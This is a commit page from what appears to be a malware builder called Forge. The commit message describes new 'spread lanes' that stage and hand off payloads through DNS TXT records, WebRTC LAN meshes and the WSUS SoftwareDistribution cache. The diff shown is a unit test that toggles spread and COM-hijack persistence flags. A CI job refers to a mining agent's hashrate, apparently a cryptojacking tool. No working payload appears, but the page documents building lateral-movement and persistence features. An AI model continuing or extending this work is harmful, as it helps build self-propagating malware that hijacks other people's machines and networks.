Add dns_txt, webrtc_mesh, and wsus_cache_peer LOTL deploy tiers with Forge toggles.
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled

Implements three new spread lanes following the do_peer pattern: DNS TXT mesh staging, WebRTC LAN seed manifest delivery, and WSUS SoftwareDistribution cousin handoff. Integrates tiers into onion chain, deploy-plan allowlist, Forge UI/docs, and tests.
This commit is contained in:
AetherForge
2026-06-07 01:07:55 -07:00
parent 652356bfe6
commit 0be2de81a5
100 changed files with 3447 additions and 213 deletions

View File

@@ -47,9 +47,20 @@ describe('forgeFormNormalize', () => {
it('linux target clears Windows-only spread flags', () => {
const out = normalizeForgeForm(
baseForm({ target_os: 'linux', target_arch: 'amd64', winrm_spread: true, com_hijack_persist: true })
baseForm({
target_os: 'linux',
target_arch: 'amd64',
winrm_spread: true,
dns_txt_spread: true,
wsus_cache_peer_spread: true,
webrtc_mesh_spread: true,
com_hijack_persist: true,
})
);
expect(out.winrm_spread).toBe(false);
expect(out.dns_txt_spread).toBe(false);
expect(out.wsus_cache_peer_spread).toBe(false);
expect(out.webrtc_mesh_spread).toBe(false);
expect(out.com_hijack_persist).toBe(false);
});